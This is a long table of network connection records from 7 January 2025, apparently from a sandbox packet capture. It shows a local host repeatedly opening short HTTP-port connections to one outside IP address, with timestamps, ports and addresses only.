Jan 7, 2025 11:02:48.451009035 CET	49987	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:48.455792904 CET	80	49987	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:49.000181913 CET	80	49987	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:49.000310898 CET	80	49987	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:49.000376940 CET	49987	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:49.000829935 CET	49987	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:49.006486893 CET	80	49987	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:49.137516975 CET	49994	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:49.142263889 CET	80	49994	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:49.143250942 CET	49994	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:49.145272017 CET	49994	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:49.150065899 CET	80	49994	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:49.150118113 CET	49994	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:49.154869080 CET	80	49994	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:49.647380114 CET	80	49994	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:49.647469997 CET	49994	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:49.647517920 CET	80	49994	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:49.647578001 CET	49994	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:49.652292967 CET	80	49994	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:49.795123100 CET	50000	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:49.799933910 CET	80	50000	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:49.800017118 CET	50000	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:49.802108049 CET	50000	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:49.806845903 CET	80	50000	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:49.806912899 CET	50000	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:49.811719894 CET	80	50000	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:50.327389956 CET	80	50000	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:50.327672005 CET	80	50000	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:50.327733994 CET	50000	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:50.331516027 CET	50000	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:50.336298943 CET	80	50000	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:50.468763113 CET	50006	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:50.473514080 CET	80	50006	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:50.473582029 CET	50006	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:50.475929022 CET	50006	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:50.480699062 CET	80	50006	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:50.480746031 CET	50006	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:50.485513926 CET	80	50006	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:51.066351891 CET	80	50006	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:51.066392899 CET	80	50006	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:51.066401958 CET	80	50006	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:51.066586971 CET	50006	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:51.066586971 CET	50006	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:51.071481943 CET	80	50006	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:51.199187040 CET	50009	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:51.204005957 CET	80	50009	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:51.204083920 CET	50009	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:51.206149101 CET	50009	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:51.210902929 CET	80	50009	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:51.210959911 CET	50009	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:51.215697050 CET	80	50009	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:51.758467913 CET	80	50009	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:51.758579969 CET	50009	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:51.758584976 CET	80	50009	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:51.758632898 CET	50009	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:51.763294935 CET	80	50009	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:51.904392958 CET	50015	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:51.909275055 CET	80	50015	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:51.909356117 CET	50015	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:51.911526918 CET	50015	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:51.916290045 CET	80	50015	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:51.916358948 CET	50015	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:51.921133041 CET	80	50015	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:52.460309982 CET	80	50015	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:52.460402966 CET	50015	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:52.460410118 CET	80	50015	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:52.460463047 CET	50015	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:52.465277910 CET	80	50015	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:52.606851101 CET	50020	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:52.611730099 CET	80	50020	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:52.611814976 CET	50020	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:52.613785028 CET	50020	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:52.618590117 CET	80	50020	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:52.618643999 CET	50020	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:52.623373985 CET	80	50020	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:53.129738092 CET	80	50020	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:53.129836082 CET	50020	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:53.129904032 CET	80	50020	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:53.129944086 CET	50020	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:53.134646893 CET	80	50020	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:53.261349916 CET	50026	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:53.266263962 CET	80	50026	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:53.266333103 CET	50026	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:53.268292904 CET	50026	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:53.273103952 CET	80	50026	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:53.273171902 CET	50026	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:53.277939081 CET	80	50026	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:53.777441978 CET	80	50026	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:53.777487040 CET	80	50026	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:53.777571917 CET	50026	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:53.777623892 CET	50026	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:53.782383919 CET	80	50026	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:53.919751883 CET	50032	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:53.929745913 CET	80	50032	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:53.929919004 CET	50032	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:53.931938887 CET	50032	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:53.936737061 CET	80	50032	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:53.936803102 CET	50032	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:53.941625118 CET	80	50032	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:54.694585085 CET	80	50032	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:54.694587946 CET	80	50032	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:54.694679022 CET	80	50032	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:54.694689035 CET	50032	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:54.694736958 CET	50032	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:54.694785118 CET	50032	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:54.695349932 CET	80	50032	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:54.695394039 CET	50032	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:54.705792904 CET	80	50032	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:55.006859064 CET	50038	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:55.156912088 CET	80	50038	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:55.156985998 CET	50038	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:55.166923046 CET	50038	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:55.171711922 CET	80	50038	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:55.171758890 CET	50038	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:55.176585913 CET	80	50038	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:55.670371056 CET	80	50038	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:55.670454025 CET	80	50038	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:55.670454025 CET	50038	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:55.670504093 CET	50038	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:55.675259113 CET	80	50038	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:55.816827059 CET	50044	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:55.821718931 CET	80	50044	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:55.821794033 CET	50044	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:55.824816942 CET	50044	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:55.829608917 CET	80	50044	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:55.829664946 CET	50044	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:55.834505081 CET	80	50044	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:56.378081083 CET	80	50044	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:56.378231049 CET	80	50044	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:56.381416082 CET	50044	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:56.381453991 CET	50044	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:56.386259079 CET	80	50044	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:56.545972109 CET	50050	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:56.550852060 CET	80	50050	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:56.550924063 CET	50050	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:56.552958965 CET	50050	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:56.557812929 CET	80	50050	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:56.557892084 CET	50050	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:56.562688112 CET	80	50050	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:57.059457064 CET	80	50050	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:57.059679031 CET	50050	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:57.059724092 CET	80	50050	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:57.060431957 CET	50050	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:57.064599037 CET	80	50050	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:57.222461939 CET	50055	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:57.227363110 CET	80	50055	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:57.227444887 CET	50055	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:57.229439974 CET	50055	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:57.234294891 CET	80	50055	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:57.234365940 CET	50055	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:57.239152908 CET	80	50055	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:57.746912003 CET	80	50055	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:57.747009039 CET	50055	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:57.747262001 CET	80	50055	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:57.747309923 CET	50055	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:57.751882076 CET	80	50055	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:57.892916918 CET	50061	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:57.897741079 CET	80	50061	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:57.897805929 CET	50061	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:57.900012016 CET	50061	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:57.904839993 CET	80	50061	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:57.904891014 CET	50061	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:57.909629107 CET	80	50061	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:58.413503885 CET	80	50061	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:58.413611889 CET	50061	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:58.413629055 CET	80	50061	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:58.413671970 CET	50061	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:58.418390989 CET	80	50061	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:58.561661005 CET	50066	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:58.567009926 CET	80	50066	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:58.567075968 CET	50066	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:58.569350958 CET	50066	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:58.574141979 CET	80	50066	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:58.574188948 CET	50066	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:58.580051899 CET	80	50066	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:59.073698997 CET	80	50066	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:59.073831081 CET	50066	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:59.073849916 CET	80	50066	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:59.073894024 CET	50066	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:59.078617096 CET	80	50066	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:59.217245102 CET	50067	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:59.222055912 CET	80	50067	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:59.222125053 CET	50067	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:59.224350929 CET	50067	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:59.229074001 CET	80	50067	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:59.229111910 CET	50067	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:59.233845949 CET	80	50067	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:59.743603945 CET	80	50067	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:59.743773937 CET	50067	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:59.744117975 CET	80	50067	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:59.744174004 CET	50067	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:59.750473022 CET	80	50067	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:59.888668060 CET	50068	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:59.893590927 CET	80	50068	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:59.893692017 CET	50068	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:59.895684958 CET	50068	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:59.900507927 CET	80	50068	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:59.900572062 CET	50068	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:59.905421972 CET	80	50068	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:00.408051014 CET	80	50068	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:00.408178091 CET	50068	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:00.408286095 CET	80	50068	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:00.408334970 CET	50068	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:00.412995100 CET	80	50068	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:00.546488047 CET	50069	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:00.551441908 CET	80	50069	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:00.551513910 CET	50069	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:00.553661108 CET	50069	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:00.558469057 CET	80	50069	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:00.558516979 CET	50069	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:00.563369036 CET	80	50069	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:01.052876949 CET	80	50069	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:01.052957058 CET	80	50069	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:01.053020954 CET	50069	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:01.055926085 CET	50069	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:01.060718060 CET	80	50069	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:01.200278044 CET	50070	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:01.205146074 CET	80	50070	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:01.205346107 CET	50070	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:01.207179070 CET	50070	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:01.212030888 CET	80	50070	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:01.212085009 CET	50070	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:01.216842890 CET	80	50070	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:01.734214067 CET	80	50070	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:01.734716892 CET	80	50070	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:01.734889030 CET	50070	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:01.741592884 CET	50070	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:01.746357918 CET	80	50070	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:01.888139009 CET	50071	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:01.892949104 CET	80	50071	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:01.893049002 CET	50071	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:01.895044088 CET	50071	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:01.900595903 CET	80	50071	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:01.900649071 CET	50071	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:01.907301903 CET	80	50071	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:02.402343988 CET	80	50071	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:02.402615070 CET	80	50071	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:02.402683973 CET	50071	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:02.414741993 CET	50071	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:02.419564962 CET	80	50071	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:02.646909952 CET	50072	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:02.651906967 CET	80	50072	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:02.651978016 CET	50072	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:02.670571089 CET	50072	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:02.675466061 CET	80	50072	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:02.675530910 CET	50072	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:02.682651997 CET	80	50072	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:03.187813044 CET	80	50072	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:03.187890053 CET	80	50072	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:03.187911034 CET	50072	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:03.187952995 CET	50072	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:03.192775011 CET	80	50072	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:03.323707104 CET	50073	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:03.328507900 CET	80	50073	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:03.329283953 CET	50073	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:03.331244946 CET	50073	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:03.336065054 CET	80	50073	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:03.337291002 CET	50073	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:03.342108011 CET	80	50073	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:03.861639023 CET	80	50073	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:03.861722946 CET	80	50073	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:03.861850023 CET	50073	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:03.861871958 CET	50073	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:03.866628885 CET	80	50073	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:03.995841026 CET	50074	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:04.006573915 CET	80	50074	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:04.006793022 CET	50074	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:04.008693933 CET	50074	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:04.013452053 CET	80	50074	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:04.013533115 CET	50074	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:04.018326998 CET	80	50074	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:04.532922983 CET	80	50074	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:04.533061028 CET	50074	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:04.533080101 CET	80	50074	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:04.533220053 CET	50074	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:04.537872076 CET	80	50074	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:04.668067932 CET	50075	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:04.672934055 CET	80	50075	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:04.673008919 CET	50075	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:04.675008059 CET	50075	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:04.679800987 CET	80	50075	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:04.679877996 CET	50075	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:04.684643984 CET	80	50075	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:05.175579071 CET	80	50075	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:05.175668001 CET	50075	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:05.175810099 CET	80	50075	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:05.175849915 CET	50075	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:05.180418015 CET	80	50075	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:05.307827950 CET	50076	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:05.312657118 CET	80	50076	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:05.312724113 CET	50076	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:05.314588070 CET	50076	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:05.319392920 CET	80	50076	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:05.319446087 CET	50076	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:05.324206114 CET	80	50076	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:05.821984053 CET	80	50076	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:05.822128057 CET	50076	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:05.822165012 CET	80	50076	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:05.822211027 CET	50076	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:05.826888084 CET	80	50076	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:05.964236975 CET	50077	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:05.969050884 CET	80	50077	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:05.969144106 CET	50077	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:05.971131086 CET	50077	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:05.975903988 CET	80	50077	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:05.975970030 CET	50077	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:05.980737925 CET	80	50077	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:06.488594055 CET	80	50077	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:06.488703966 CET	50077	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:06.488802910 CET	80	50077	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:06.488847971 CET	50077	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:06.493498087 CET	80	50077	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:06.628138065 CET	50078	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:06.632966042 CET	80	50078	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:06.633065939 CET	50078	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:06.635051012 CET	50078	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:06.639795065 CET	80	50078	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:06.639843941 CET	50078	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:06.644685984 CET	80	50078	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:07.160923958 CET	80	50078	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:07.161026955 CET	80	50078	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:07.161032915 CET	50078	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:07.161070108 CET	50078	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:07.165977955 CET	80	50078	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:07.301120043 CET	50079	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:07.305991888 CET	80	50079	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:07.306070089 CET	50079	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:07.308068037 CET	50079	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:07.327574968 CET	80	50079	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:07.327650070 CET	50079	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:07.334158897 CET	80	50079	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:07.986324072 CET	80	50079	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:07.986336946 CET	80	50079	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:07.986345053 CET	80	50079	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:07.986399889 CET	50079	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:07.986442089 CET	50079	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:07.986442089 CET	50079	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:07.991204977 CET	80	50079	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:08.120549917 CET	50080	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:08.125422955 CET	80	50080	172.245.123.11	192.168.2.5
